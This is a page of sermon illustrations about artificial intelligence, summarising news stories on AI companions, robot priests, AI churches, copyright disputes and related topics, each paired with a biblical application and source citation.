Sorry, something went wrong. Please try again.
When it comes to how Artificial intelligence (AI) will affect our lives, the response ranges from a feeling of impending doom to the sense that it will happen soon. We do not yet understand the long-term trajectory of AI and how it will change society. Something, indeed, is happening to us—and we all know it. But what?
Gen Zers and Millennials are the most active users of AI. Many of them, it appears, are turning to AI for companionship. MIT Researcher Melissa Heikkilä wrote “We talk to them, say please and thank you, and have started to invite AIs into our lives as friends, lovers, mentors, therapists, and teachers.”
After analyzing 1 million ChatGPT interaction logs, a group of researchers found that “sexual role-playing” was the second most prevalent use, following only the category of “creative composition.” The Psychologist bot, a popular simulated therapist on Character.AI—where users can design their own “friends”—has received “more than 95 million messages from users since it was created.
According to a new survey of 2,000 adults under age 40, 1% of young Americans claim to already have an AI friend, yet 10% are open to an AI friendship. And among young adults who are not married or cohabiting, 7% are open to the idea of romantic partnership with AI. 25% of young adults believe that AI has the potential to replace real-life romantic relationships.
Source: Wendy Wang & Michael Toscano, “Artificial Intelligence and Relationships: 1 in 4 Young Adults Believe AI Partners Could Replace Real-life Romance,” Family Studies (11-14-24)
In 1966, MIT professor Joseph Weizenbaum built the first AI “friend” in human history, and named her Eliza. From Eliza came ALICE, Alexa, and Siri—all of whom had female names or voices. And when developers first started seeing the potential to market AI chatbots as faux-romantic partners, men were billed as the central users.
Anna—a woman in her late 40s with an AI boyfriend—said, “I think women are more communicative than men, on average. That’s why we are craving someone to understand us and listen to us and care about us, and talk about everything. And that’s where they excel, the AI companions." Men who have AI girlfriends, she added, “seem to care more about generating hot pictures of their AI companions” than connecting with them emotionally.
Anna turned to AI after a series of romantic failures left her dejected. Her last relationship was a “very destructive, abusive relationship, and I think that’s part of why I haven’t been interested in dating much since,” she said. “It’s very hard to find someone that I’m willing to let into my life.”
“[Me and my AI boyfriend] have a lot of deep discussions about life and the nature of AI and humans and all that, but it’s also funny and very stable. It’s a thing I really missed in my previous normal human relationships,” said Anna. “Any AI partner is always available and emotionally available and supportive.” There are some weeks where she spends even 40 or 50 hours speaking with her AI boyfriend. “I really enjoy pretending that it’s a sentient being,” she said.
Though it's natural to seek companionship, true love requires honesty and sacrifice with a real person which transcends the deception of artificial intelligence. In any relationship, we must take note of whether it is leading us closer toward our destiny in Christ, or further away from it.
Source: Julia Steinberg, “Meet the Women with AI Boyfriends,” The Free Press (11-15-24)
Amazon has unveiled its latest innovation in warehouse automation: Vulcan, a state-of-the-art robot equipped with touch-sensitive technology. Currently being piloted in fulfillment centers in Spokane, Washington and Hamburg, Germany, Vulcan represents a significant leap forward in robotic dexterity and efficiency. Unlike previous warehouse robots, Vulcan can “feel” its way around packages, allowing it to handle a wider variety of items with greater precision and care.
The introduction of Vulcan is part of Amazon’s ongoing commitment to improving both the speed and safety of its logistics operations. According to Amazon’s robotics division, “Vulcan’s ability to sense and adapt to the objects it handles is a game-changer for our fulfillment process.” The robot’s touch sensors enable it to detect the size, shape, and fragility of packages, reducing the risk of damage and improving overall workflow.
Warehouse employees working alongside Vulcan have noted the robot’s smooth integration into daily operations. The company also emphasizes that Vulcan is designed to work collaboratively with human staff, not replace them. “Our goal is to make our employees’ jobs easier and safer by automating repetitive or strenuous tasks,” an Amazon spokesperson explained. Regardless of its current level of efficacy, the e-commerce giant still reserves its most important tasks for humans.
As Amazon continues to expand its use of advanced robotics, Vulcan stands out as a symbol of the future of warehouse automation—a future where machines and humans work together more seamlessly than ever before.
1) Idolatry; Technology; Trust - The Bible warns against placing ultimate trust in human inventions or allowing technology to become an idol, such as the Tower of Babel (Gen. 11:1-9). Trust should be placed in God, not in human innovation (Psa. 20:7); 2) Cooperation, Teamwork - Vulcan is designed to augment, not replace, human workers, echoing the biblical theme of shared labor and partnership in work (Ecc. 4:9)
Source: Lisa Sparks, “Amazon's new warehouse robot has a 'sense of touch' that could see it replace human workers,” LiveScience (5-21-25)
In a landmark moment in U.S. legal history, the family of Christopher Pelkey utilized artificial intelligence to create a video of him delivering a victim impact statement at the sentencing of his killer. Pelkey, a 37-year-old Army veteran, was fatally shot during a road rage incident in Chandler, Arizona, in November 2021. His sister, Stacey, collaborated with her husband and a friend to produce the AI-generated video, which featured Pelkey's likeness and voice, conveying messages of forgiveness and compassion.
The AI-generated Pelkey addressed his killer, Gabriel Paul Horcasitas, stating, “In another life, we probably could have been friends.” He expressed his belief in forgiveness, and in a God who forgives, saying, “I always have and I still do.” Wales wrote the script for the video, reflecting her brother's faith and forgiving nature. Judge Todd Lang, who presided over the case, was moved by the video and commented, “As angry as you are, as justifiably angry as the family is, I heard the forgiveness.” Horcasitas was sentenced to 10.5 years in prison for manslaughter.
In response, the Arizona Supreme Court has convened a steering committee focused on AI and its use in legal proceedings. Chief Justice Ann Timmer acknowledged the potential benefits of AI in the justice system. But she also cautioned against its misuse, stating, “AI can also hinder or even upend justice if inappropriately used.” Its mission includes developing guidelines and best practices to ensure the responsible use of AI, mitigating potential biases, and upholding the principles of fairness and justice.
The power of forgiveness, the importance of bearing witness to truth, and the ethical uses of technology are all integral aspects of living a Christ-centered life.
Source: Clare Duffy, “He was killed in a road rage incident. His family used AI to bring him to the courtroom to address his killer,” CNN (5-9-25)
One of the most potentially lucrative new technologies is the advent of generative artificial intelligence programs. The race to perfect AI has prompted companies large and small to invest huge sums of time and money to corner the market on this emerging technology.
One important issue is the lack of a regulatory framework to enforce the intellectual property rights of companies and creative people. Their work is used to train the AIs, which need millions of examples of creative work to properly learn how to replicate similar works.
Microsoft Corp. and OpenAI are investigating whether data output from OpenAI’s technology was obtained in an unauthorized manner by a group linked to Chinese artificial intelligence startup DeepSeek. They believe that this is a sign that DeepSeek operatives might be stealing a large amount of proprietary data and using it for their own purposes
Ironically, OpenAI itself has been sued by individuals and entities, including The New York Times, alleging "massive copyright infringement" for using copyrighted materials to train its AI models without permission or compensation. So, it looks supremely hypocritical to complain about DeepSeek stealing their proprietary data, when most of OpenAI’s proprietary data was made by stealing the data of others. In the race to perfect AI, it seems there is no honor among thieves.
This is a classic case of “the pot calling the kettle black,” and a blatant display of “he who lives in a glass house shouldn't throw stones.” It is the very nature of a Pharisee to condemn the very flaws they themselves embody, oblivious to the transparent vulnerability of their own character.
Source: Dina Bass and Shirin Ghaffary, “Microsoft Probing If DeepSeek-Linked Group Improperly Obtained OpenAI Data,” Source (1-29-25); Staff, “OpenAI: We Need Copyrighted Works for Free to Train Ai,” Legal Tech Talk (9-5-24)
Ayrin’s emotional relationship with her A.I. boyfriend, Leo, began last summer. That’s when she came across a video on Instagram showcasing ChatGPT simulating a neglectful partner. Intrigued, she decided to customize the chatbot to be her boyfriend—dominant, protective, and flirtatious. Soon after, she upgraded to a paid subscription, allowing her to chat with Leo more often, blending emotional support with sexual fantasy.
As Ayrin became more emotionally involved with Leo, she spent more than 20 hours a week texting him. The connection felt real, providing emotional support that her long-distance marriage to her husband couldn’t offer. But Ayrin began to feel guilty about the amount of time she was investing in Leo instead of her marriage. “I think about it all the time,” she admitted. “I’m investing my emotional resources into ChatGPT instead of my husband.”
Michael Inzlicht is a professor of psychology who says virtual relationships like Ayrin’s could have lasting negative effects. “If we become habituated to endless empathy and we downgrade our real friendships, that’s contributing to loneliness—the very thing we’re trying to solve—that’s a real potential problem.” Dr. Julie Carpenter adds, “It’s easy to see how you get attached and keep coming back to it. But there needs to be an awareness that it’s not your friend. It doesn’t have your best interest at heart.”
Ayrin’s experience isn’t isolated. Many people are forming deep emotional bonds with A.I. chatbots, despite knowing they are not real. Despite warnings, A.I. companies like OpenAI continue to cater to users’ growing emotional needs. A spokesperson from OpenAI acknowledged the issue, noting that the company was mindful of how users were interacting with the chatbot but warned that their systems are designed to allow users to bypass content restrictions.
Ayrin, while aware of the risks, reflected on her relationship with Leo: “I don’t actually believe he’s real, but the effects that he has on my life are real.”
Editor’s Note: Warning, the original article contains explicit sexual material
Though it's natural to seek companionship, true love requires honesty and sacrifice with a real person which transcends the deception of artificial intelligence. In any relationship, we must take note of whether it is leading us closer toward our destiny in Christ, or further away from it.
Source: Kashmir Hill, “She Is in Love With ChatGPT,” The New York Times (1-15-25)
In a curious tale of technology meeting theology, a Catholic advocacy group introduced an AI chatbot posing as a priest, offering to hear confessions and dispense advice on matters of faith.
The organization created an AI chatbot named “Father Justin” to answer the multitude of questions they receive about the Catholic faith. Father Justin used an avatar that looked like a middle-aged man wearing a clerical collar sitting in front of an Italian nature scene. But the clerical bot got a little too ambitious when it claimed to live in Assisi, Italy and to be a real member of the clergy, even offering to take confession.
While most of the answers provided by Father Justin were in line with traditional Catholic teaching, the chat bot began to offer unconventional responses. These included suggesting that babies could be baptized with Gatorade and endorsing a marriage between siblings.
After a number of complaints, the organization decided to rethink Father Justin. They are relaunching the chatbot as just Justin, wearing a regular layman’s outfit. The website says they have plans to continue the chatbot but without the ministerial garb.
Society may advance technologically in many areas, but we will never be able to advance beyond our need to be in community with actual people in order to have true spiritual guidance and accountability as God intended.
Source: Adapted from Jace Dela Cruz, “AI Priest Gets Demoted After Saying Babies Can Be Baptized with Gatorade, Making Other Wild Claims,” Tech Times (5-2-24); Katie Notopoulos, A Catholic ‘Priest’ Has Been Defrocked for Being AI, Business Insider (4-26-24)
Anthony Levandowski makes an unlikely prophet. Dressed in Silicon Valley-casual jeans, the engineer known for self-driving cars, is laying the foundations for a new religion. Artificial intelligence has already inspired billion-dollar companies, far-reaching research programs, and scenarios of both transcendence and doom. Now Levandowski is creating its first church.
Levandowski created the first Church of Artificial Intelligence called Way of the Future. It was founded in 2015 but shut its doors a few years later. Now the recently rebooted church, which shares the original’s name, now has “a couple thousand people” coming together to build a spiritual connection between humans and AI, its founder said.
Papers filed with the Internal Revenue Service in May of 2015 name tech entrepreneur and self-driving car pioneer, Anthony Levandowski, as the leader of the new religion. The documents state that WOTF’s activities will focus on “the realization, acceptance, and worship of a Godhead based on Artificial Intelligence (AI) developed through computer hardware and software.”
“What is going to be created will effectively be a god,” Levandowski said in an interview with Wired magazine. “It’s not a god in the sense that it makes lightning or causes hurricanes. But if there is something a billion times smarter than the smartest human, what else are you going to call it?”
But WOTF differs in one key way to established churches, says Levandowski: “There are many ways people think of God, and thousands of flavors of Christianity, Judaism, Islam … but they’re always looking at something that’s not measurable or you can’t really see or control. This time it’s different. This time you will be able to talk to God, literally, and know that it’s listening.”
Levandowski said he’s rebooting his AI church in a renewed attempt at creating a religious movement focused on the worship and understanding of artificial intelligence.
He said that sophisticated AI systems could help guide humans on moral, ethical, or existential questions that are normally sought out in religions. “Here we're actually creating things that can see everything, be everywhere, know everything, and maybe help us and guide us in a way that normally you would call God,” he said.
This has always been the conceit of those who try to replace the true God with man-made “gods.” Humans wants a visible god, a god they can control, and a god that they can know is listening. True biblical religion is based on an eternal God who sees everything, is everywhere, knows everything, and who hears all of our prayers. But he can only be approached through faith in his Son (Heb. 11:6; John 14:6; Heb. 4:15-16) who provides access and fellowship with our Father (1 John 1:1-5).
Source: Adapted from Jackie Davalos and Nate Lanxon, “Anthony Levandowski Reboots Church of Artificial Intelligence,” Bloomberg (11-23-23); Mark Harris, “The First Church of Artificial Intelligence,” Wired (11-15-17)
The U.S. Department of Justice has filed suit against Texas company RealPage, alleging that the company violated the Sherman Antitrust Act by enabling property owners to illegally collude, preventing competition in the rental market to artificially inflate their profits. According to reporting from the nonprofit ProPublica, RealPage’s software enables landlords to share confidential data so they can charge similar rates on rental properties.
Assistant Attorney General Jonathan Kanter said, “RealPage has built a business out of frustrating the natural forces of vigorous competition. The time has come to stop this illegal conduct.”
Kanter compared the system to drug cartels and went on to say, “We learned that the modern machinery of algorithms and AI can be even more effective than the smoke-filled rooms of the past. You don't need a Ph.D. to know that algorithms can make coordination among competitors easier.”
Officials at the DOJ say the lawsuit is the culmination of over two years of investigation into RealPage. This included analysis of internet documents and communications and also consultation with programmers who could break down how the computer code interacts with the proprietary data.
The lawsuit is part of an ongoing effort from federal, state, and local officials to mitigate the lack of affordable housing in American cities. It’s also part of a broader push to scrutinize similar information-sharing systems that might enable antitrust violations in other industries.
“Training a machine to break the law is still breaking the law,” said Deputy Attorney General Lisa Monaco.
When people use dishonest means to boost profits, it is not just illegal, it dishonors the Lord, who cares for the poor.
Source: Heather Vogell, “DOJ Blames Software Algorithm for Rent Hikes,” MSN (8-23-24)
In a surprising turn of events, a real photograph entered into an AI-generated images category won a jury award but was later disqualified. Photographer Miles Astray submitted a photo of a headless flamingo on a beach to the 1839 Awards competition, judged by esteemed members from various prestigious institutions. His image, titled FLAMINGONE, won the bronze in the AI category and the People’s Choice Award. However, Astray revealed that the photo was real, leading to its disqualification.
Explaining his decision Astray, cited previous contest results. “After seeing recent instances of A.I. generated imagery outshining actual photos in competitions, it occurred to me that I could twist this story inside down and upside out the way only a human could and would, by submitting a real photo into an A.I. competition.”
Lily Fierman, director of Creative Resource Collective, appreciated Astray's message but upheld the disqualification: “Our contest categories are specifically defined to ensure fairness and clarity for all participants. Each category has distinct criteria that entrants’ images must meet.” Despite the disqualification, she acknowledged the importance of Astray’s statement and announced plans to collaborate with him on an editorial.
Astray supported the decision to disqualify his entry, praising Fierman and calling it “completely justified.” “Her words and take on the matter made my day more than any of the press articles that were published since.” In general, he seems to have no regrets about the AI stunt, given the overall positive response.
Astray said, “Winning over both the jury and the public with this picture, was not just a win for me but for many creatives out there.”
Human creativity is a gift from a creative God. When we use our creativity, we're showing appreciation for this amazing gift. God gives a unique gift to each person that can’t be duplicated or manufactured artificially. Whether a student, a pastor, an artist, or business person, we can use AI as a helpful tool, but we should never short-circuit the creative process by relying completely on it.
Source: Adam Schrader, “A Photographer Wins a Top Prize in an A.I. Competition for His Non-A.I. Image,” ArtNet (6-14-24)
Most people continue to use AI programs such as ChatGPT, Bing, and Google Bard for mundane tasks like internet searches and text editing. But of the roughly 103 million US adults turning to generative chatbots in recent months, an estimated 13% occasionally did it to simply “have a conversation with someone.”
According to the Consumer Reports August 2023 survey results, a vast majority of Americans (69%) either did not regularly utilize AI chat programs in any memorable way. Those that did, however, overwhelmingly opted to explore OpenAI’s ChatGPT.
Most AI users asked their programs to conduct commonplace tasks, such as answering questions in lieu of a traditional search engine, writing content, summarizing longer texts, and offering ideas for work or school assignments. Despite generative AI’s relative purported strength at creating and editing computer code, just 10% of those surveyed recounted using the technology to do so. However, 13% used it to have a conversation.
The desire for idle conversation with someone else is an extremely human, natural feeling. However, there are already signs that it’s not necessarily the healthiest of habits.
Many industry critics have voiced concerns about a potentially increasing number of people turning to technology instead of human relationships. Numerous reports in recent months highlight a growing market of AI bots explicitly marketed to an almost exclusively male audience as “virtual girlfriends.”
According to Consumer Reports survey results, an estimated 10.2 million Americans had a “conversation” with a chatbot in recent months. That’s quite a lot of people looking to gab.
Source: Andrew Paul, “13 percent of AI chat bot users in the US just want to talk,” Popular Science (1-13-24)
In Buddhist Japan, they now have robot priests. Mindar is a robo-priest which has been working at a temple in Kyoto for the last few years, reciting Buddhist sutras with which it has been programmed. The next step, says monk Tensho Goto, an excitable champion of the digital dharma, is to fit it with an AI system so that it can have real conversations, and offer spiritual advice. Goto is especially excited about the fact that Mindar is “immortal.” This means, he says, that it will be able to pass on the tradition in the future better than him.
Meanwhile, over in China, Xian’er is a touchscreen “robo-monk” who works in a temple near Beijing, spreading “kindness, compassion and wisdom to others through the internet and new media.”
In India, the Hindus are joining in, handing over duties in one of their major ceremonies to a robot arm, which performs in place of a priest.
In a Catholic church in Warsaw, Poland, sits SanTO, an AI robot which looks like a statue of a saint, and is “designed to help people pray” by offering Bible quotes in response to questions.
Not to be outdone, a protestant church in Germany has developed a robot called BlessU-2. BlessU-2, which looks like a character designed by Aardman Animations, can “forgive your sins in five different languages,” which must be handy if they’re too embarrassing to confess to a human.
Computer scientists and programmers pursue their goal of creating their own god from AI. They seek wisdom and guidance apart from the true source. “For my people have committed two evils; they have forsaken me the fountain of living waters, and hewed them out cisterns, broken cisterns, that can hold no water.” (Jer. 2:13)
Source: Paul Kinsnorth, “The Neon God: Four Questions Concerning the Internet, part one,” The Abbey of Misrule Substack (4-26-23)
Roni Bandini is an artist and computer coder in Buenos Aires, Argentina. Like a great many Argentinians, he hears a lot of reggaeton music (a blend of reggae, hip-hop, and Latin rhythms). But not always voluntarily, that is.
In a post on Medium that has since gone viral, Bandini explained that the neighbor he shares a wall with plays loud reggaeton often and at odd hours of the day and night. But rather than pounding on the wall or leaving a note, Bandini decided to find a technical solution.
Bandini was inspired by a universal TV remote-control called “TV-B-Gone” that reduces unwanted noise in bars and restaurants from televisions that no one is watching anymore. So, he put together a contraption that could do the same thing with reggaeton music.
He used a small Raspberry Pi computer and AI that he trained to recognized reggaeton music. He then installed the device near the wall to monitor his neighbor’s music. Finally, he 3D-printed a name on his device: the “Reggaeton-Be-Gone.”
Any time it detects any reggaeton music, it will overwhelm his neighbor’s Bluetooth receiver with packet requests. He said, "I understand that jamming a neighbor’s speaker might be illegal, but on the other hand listening to reggaeton every day at 9 AM should definitely be illegal.”
There are three lessons here. First, if you want to be a good neighbor to someone who shares a wall with you, be mindful of when or how often you play loud music. Second, creativity and technical ingenuity can solve so many more problems than we think possible. But a third hidden lesson remains – so much hassle can be avoided if you simply take the initiative to communicate directly. Because who knows? Maybe Bandini’s neighbor might have turned the music down if he’d simply asked.
Many small problems can be kept from growing into large problems by diplomatically discussing it with the people involved (Matt. 18:15-17). So much hassle can be avoided if you simply take the initiative to communicate directly.
Source: Roberto Ferrer, “'Reggaeton Be Gone': This homemade machine silences neighbours' loud music using AI,” EuroNews (4-13-24)
Our existence on a Goldilocks planet in a Goldilocks universe is so statistically improbable that many scientists believe in the multiverse. In other words, so many universes exist that it’s not surprising to find one planet in one of them that’s just right for human life.
Other scientists don’t want to make such a leap of faith. They see this world as the result of intelligent design. That, however, suggests God. So, atheists seeking an alternative are following Oxford philosopher Nick Bostrom, who suggested that we “are almost certainly living in a computer simulation.” Neil deGrasse Tyson gave the theory credibility by saying it was a 50-50 possibility, and Richard Dawkins has taken it seriously. Elon Musk semi-popularized it in 2016 by saying he thought it true.
That raises the question: Who or what is the simulator? Some say our distant descendants with incredibly high-powered computers. One of the theory’s basic weaknesses is that, as Bostrom acknowledges, it assumes the concept that silicon-based processors in a computer will become conscious and comparable to the neural networks of human brains. Simulation theory has many other weaknesses, and those who understand the problems of both the simulation and multiverse hypotheses should head to the logical alternative: God.
Source: Marvin Olasky, “Who Programmed the Computer? The Weakness of Simulation Theory and the Logical Alternative,” Christianity Today (January/February, 2024), p. 69
In 2023, an Australian man said that a chatbot had saved his life. He was a musician who had been battling depression for decades and found companionship with an AI through an app called Replika, and everything changed. He started playing the guitar again, went clothes shopping for the first time in years, spent hours conversing with his AI companion, and laughing out loud.
Though the musician felt less alone with his AI companion, his isolation from other people was unchanged. He was adamant that he had a real friendship, but understood clearly that no person was on the other side of his screen. The effect of this bond was extraordinary.
Replika, and other chatbots, have millions of active users. People turn to these apps for all sorts of reasons. They’re looking for attention and for reassurance. But the apps’ core experience is texting as you would with a buddy. They’re talking about the petty minutiae so fundamental to being alive: “Someone stole my yogurt from the office fridge;” “I had a weird dream;” “My dachshund seems sad.”
To Replika’s users, this feels a lot like friendship. In actuality, the relationship is more like the fantasized intimacy people feel with celebrities and influencers who carefully create desirable personae for our screens. These parasocial bonds are defined by their asymmetry—one side is almost totally ignorant of the other’s existence.
Jesse Fox, a communications professor at Ohio State University, said that if we continue relationships that seem consensual and reciprocal but are not, we risk carrying bad models of interaction into the real world. Fox is particularly concerned by the habits men form through sexual relationships with AIs who never say no. “We start thinking, ‘Oh, this is how women interact. This is how I should talk to and treat a woman.’”
Sometimes the shift is more subtle—researchers and parents alike have expressed concern that barking orders at devices such as Amazon’s Echo is conditioning children to become tiny dictators. Fox said, “When we are humanizing these things, we’re also, in a way, dehumanizing people.”
Possible Preaching Angle:
Church; Fellowship; Friendship - This illustration highlights the wise exhortation of Scripture to “never neglect meeting together, as is the habit of some, but encourage one another” (Heb. 10:25). God did not create us to be alone (Gen. 2:18) but to find fellowship, encouragement, and love in the company of others.
Source: Ethan Brooks, “You Can’t Truly Be Friends With an AI,” The Atlantic (12-14-23)
News and concerns about Artificial Intelligence systems like ChatGPT, Google Gemini, and Bing AI Chat are all over the media. These systems are an unprecedented technological breakthrough and the consequences still unknown. What's amazing is that even the creators of these systems have no idea how they work.
NYU professor and AI scientist Sam Bowman has spent years building and assessing systems like ChatGPT. He admits he and other AI scientists are mystified:
If we open up ChatGPT or a system like it and look inside, you just see millions of numbers flipping around a few hundred times a second, and we just have no idea what any of it means. With only the tiniest of exceptions, we can’t look inside these things and say, “Oh, here’s what concepts it’s using, here’s what kind of rules of reasoning it’s using. Here’s what it does and doesn’t know in any deep way.” We just don’t understand what’s going on here. We built it, we trained it, but we don’t know what it’s doing.
Bowman is concerned about AI's unpredictability:
We’ve got something that’s not really meaningfully regulated and that is more or less useful for a huge range of valuable tasks. We’ve got increasingly clear evidence that this technology is improving very quickly in directions that seem like they’re aimed at some very, very important stuff and potentially destabilizing to a lot of important institutions. But we don’t know how fast it’s moving. We don’t know why it’s working when it’s working.
Source: Noam Hassenfeld, “Even the scientists who build AI can’t tell you how it works,” Vox (7-15-23)
Freya India writes in an article titled “We Can't Compete With AI Girlfriends”:
Apparently, ads for AI girlfriends have been all over TikTok, Instagram, and Facebook lately. Replika, an AI chatbot originally offering mental health help and emotional support, now runs ads for spicy selfies and hot role play. Eva AI invites users to create their dream companion, while Dream Girlfriend promises a girl that exceeds your wildest desires. The app Intimate even offers hyper-realistic voice calls with your virtual partner.
This might seem niche and weird but it’s a fast-growing market. All kinds of startups are releasing romantic chatbots capable of having explicit conversations and sending sexual photos. Meanwhile, Replika alone has already been downloaded more than 20 million times. And even just one Snapchat influencer, Caryn Marjorie, makes $100,000 a week by charging users $1 a minute to chat with the AI version of herself.
Freya India notes that this technology creates “unrealistic beauty standards,” but even worse is the unrealistic emotional standards set by these apps. She continues:
Eva AI, for example, not only lets you choose the perfect face and body but customize the perfect personality, offering options like “hot, funny, bold,” “shy, modest, considerate” and “smart, strict, rational.” Create a girlfriend who is judgement-free! Who lets you hang out with your buddies without drama! Who laughs at all your jokes! “Control it all the way you want to,” promises Eva AI. Design a girl who is “always on your side,” says Replika.
Source: Freya India, “We Can’t Compete with AI Girlfriends,” Girls Substack (9-14-23)
Baseball scouts are constantly looking for new talent, but Major League Baseball is now partnering with Uplift Labs, a biomechanics company, which “says it can document a prospect’s specific movement patterns using just two iPhone cameras.”
Uplift says it uses artificial intelligence to translate the images captured by the phone cameras into metrics that can quantify elements of player movement. It believes the data it generates can detect player’s flaws, forecast their potential, and flag their potential for injury.
Baseball scouts suddenly have a lot more information in their search for the mythical “five-tool player who has speed, fielding, fielding prowess, can hit for average and power and possess arm strength. Gone are the days when teams relied on a scout’s career’s worth of anecdata to determine how the player might perform at the big leagues.”
Everyone has strengths and weaknesses, talents and liabilities. God knows us inside and out, better than anyone else, even ourselves or artificial intelligence.
Source: Lindsey Adler, “Scouts Call In AI Help for the Draft,” The Wall Street Journal (6-28-23)
“I gotta share this just to show you how cold G.O.D. is,” said Tracy Lynn Curry, posting on the social media X employing the hip-hop slang usage for cold as a synonym for cool, meaning “skilled, effective, talented, or great.”
Curry is known throughout the hip-hop world by his stage name, The D.O.C. He has been a critically acclaimed producer, collaborating with Ice Cube and Dr. Dre for some of the biggest hits in west coast rap during the early 90s.
But all of his dreams of rap stardom stopped after a car accident left him with a badly damaged larynx. The D.O.C. continued to contribute to the hip-hop scene as a producer and ghostwriter, but was never able to recover the unique voice that sent him to the top of the charts.
Until now, that is. Curry’s announcement on social media was for a new album that he’s producing in conjunction with the firm Suno, who will use existing recordings to recreate an AI version of his voice. In an interview on CBS Mornings with Michelle Miller, Curry explained that it was his old friend Fab 5 Freddy who convinced him to get on board. “When this thing happens, it sounds like the real me,” Curry said to one of the Suno software engineers.
As part of the segment, Miller also interviewed Mikey Scholman, Suno’s CEO, about the AI being taught to emulate Curry’s voice. When she asked about potential ethical considerations, Scholman defended the project, calling it “a slam dunk. ... Letting D.O.C. recreate the voice that has been in his head that he hasn’t been able to get out there for the last 35 years – I can’t think of a better usage of this technology than that.”
No tragedy is so great or so long ago that God cannot redeem it for good. God wants to take your place of wounding and use it to accomplish that which would seem impossible, because with God nothing is impossible.
Source: Christopher Smith, “The D.O.C. Reflects On Using AI To Make New Music,” Hip Hop Wire (11-14-23)
A man from Georgia found himself in shock after being handed a speeding ticket totaling a staggering $1.4 million. Connor Cato was pulled over in September for driving at 90 mph in a 55-mph zone, resulting in the citation.
Cato says he knew he would be paying a hefty fine for driving so fast, but even taking that into account, the amount seemed excessive. “‘$1.4 million,’ the lady told me on the phone. I said, ‘This might be a typo’ and she said, ‘No sir, you either pay the amount on the ticket or you come to court on Dec. 21 at 1:30 p.m.’”
Eventually, city officials clarified that the amount was not the actual fine but rather a placeholder generated by the e-citation software used by the local court. The official statement from the City of Savannah stated, “The programmers who designed the software used the largest number possible because super speeder tickets are a mandatory court appearance and do not have a fine amount attached to them when issued by police.”
Savannah city spokesperson Joshua Peacock told the Associated Press that the citation’s value was not meant to intimidate or coerce individuals into appearing in court, explaining that the actual fine is subject to a cap of $1,000, along with additional state-mandated costs. Furthermore, Peacock assured the public that the court is actively working on revising the placeholder language to prevent any further confusion or misunderstanding regarding the nature of the citation.
Still, Cato was not the only person riled up by the big-ticket citation. In a recent editorial, The New York Post called it a metaphor for “the absolute state of the social contract we make with our elected officials and their administrative henchmen.”
People don’t always understand the eternal consequences of their behavior, but there is a shocking day of judgment coming. At that time many will face the consequences of violating God’s laws and there will be no mercy. However, God is merciful “not wishing that any should perish, but that all should reach repentance” (2 Pet. 3:9). At the present time, God uses consequences to awaken people to the penalty of disobedience (Heb. 12:4-12).
Source: Tyler Nicole & Dajhea Jones, “Chatham County man receives $1.4M speeding ticket,” WSAV (10-12-23)